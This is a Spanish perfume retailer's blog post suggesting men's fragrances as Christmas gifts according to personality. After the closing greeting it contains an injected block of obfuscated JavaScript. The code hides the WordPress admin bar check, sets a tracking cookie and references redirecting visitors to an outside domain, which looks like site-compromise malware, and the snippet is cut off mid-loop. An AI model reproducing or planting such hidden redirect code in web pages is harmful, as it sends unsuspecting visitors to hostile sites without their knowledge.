La Navidad cada vez más cerca y la presión por tener todos los regalos aumenta. Nosotras queremos que este año también acertéis con los chicos de vuestra familia: primos, hermanos, novios, padres y amigos. Por eso, en el artículo de hoy os traemos una lista de perfumes masculinos para diferentes tipos de personalidad. Sí, no todos los hombres son iguales y no a todos les encaja el mismo perfume. Tranquilas, esta lista ha venido a salvaros como la que os mostramos la semana pasada con los mejores perfumes para ellas, ¿os acordáis? Pues toca estar atentas porque después de este post vuestras navidades serán mucho más sencillas, inolvidables y, además, olerán mejor. ¡A por todas!

 Hermosa joven está de pie detrás de su novio con un regalo en una mano y se cubrió los ojos con la otra mano.

Dolce & Gabbana K – Para los que saben dónde y cómo estar

¿Sabéis ese tipo de hombre que parece no haber roto un plato en su vida? Siempre bien vestido, seguro de sí mismo, capaces de hablar de cualquier tema con profundidad. Disponible tanto si hay que cambiar una bombilla, hacer la cena o coser el bajo de un pantalón. Sí, ese tipo de hombre siglo XXI. Para ellos, K de Dolce & Gabbana ha combinado la naranja sanguina y el limón siciliano, la salvia, el geranio y el lavandín con las bayas de enebro y el toque picante de la pimienta de Jamaica para dar como resultado una fragancia fresca y masculina. Un olor que inunda la habitación (buena estela) perdura en el tiempo (longevidad alta) y empapa los sentidos para atraernos hacia él. Escapar ya es voluntario.

frasco colonia color morado y tapon con forma de corona dorada

DIOR Sauvage – Para los desenfadados de la casa

Una fragancia que incita a la aventura es como podríamos resumir el concepto que se esconde detrás de este perfume de la casa Dior. Saber a quién regalárselo es fácil si tenemos la suerte de tener un familiar o amigo cercano que destaque por su fuerte personalidad, su estilo desenfadado y mente abierta. El mismo que ha estado o sueña con estar en lugares tan mágicos como la India, Vietnam o el Cairo. Para sorprenderle, el inconfundible aroma de Sauvage de Dior – amaderado con toques de vainilla y cuero – es vuestra mejor opción. Sin duda, este perfume destaca por su densidad: lo envuelve todo y a todos en él.

frasco colonia masculina cilindrica de color azul

Carolina Herrera Bad Boy – Para los que siempre están de buen humor

Un perfume tan icónico como el frasco que lo contiene. Os podemos asegurar que queda de maravilla en la estantería, junto a los libros. Su aroma exótico frutal al principio con notas de haba tonka al final encaja muy bien con la personalidad de los jóvenes adultos que disfrutan del buen humor en todo momento. Los mismos que alteran una comida familiar con su ingenio y personalidad desbordantes. Eso es, los graciosillos de la familia. Para ellos, Bad Boy de Carolina Herrera es el regalo perfecto, una fragancia con una longevidad alta y una estela que sorprende por lo original de sus ingredientes.

Frasco de colonia masculina con forma de rayo y de color negro

Valentino Born in Roma Uomo – Para los que siempre van a la última

Estar siempre a la última es algo que encaja muy bien con este tipo de chico. Un hombre urbano, con presencia que no se pierde nunca una buena reunión social ya sea en familia o con amigos.  Vamos, el que siempre lleva la voz cantante en los grupos de WhatsApp y sabe organizar siempre el mejor plan. Para ellos, esta fragancia amaderada es perfecta porque, al igual que ellos, se ha reinventado. Uniendo lo clásico con lo moderno, Born In Roma Uomo incluye jengibre y sal entre sus ingredientes. Por eso, sabemos que ese primo o hermano que sabe el nombre de memoria la lista de restaurantes de moda de la ciudad y, al mismo tiempo, la letra de “Mi Gran Noche”, sabrá apreciar este perfume. ¡Regalárselo!

frasco de colonia negro y ligeramente redondeado y con relieve con letras color rosa de la marca valentino

La ilusión navideña continúa en Perfumerías Tin Tin, donde esperamos que este año regalar sea sinónimo de acertar. Así que ya sabéis, localizar a los chicos de la familia y del grupo de amigos, observar y descubrir su perfume ideal. ¡Felices Fiestas! var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone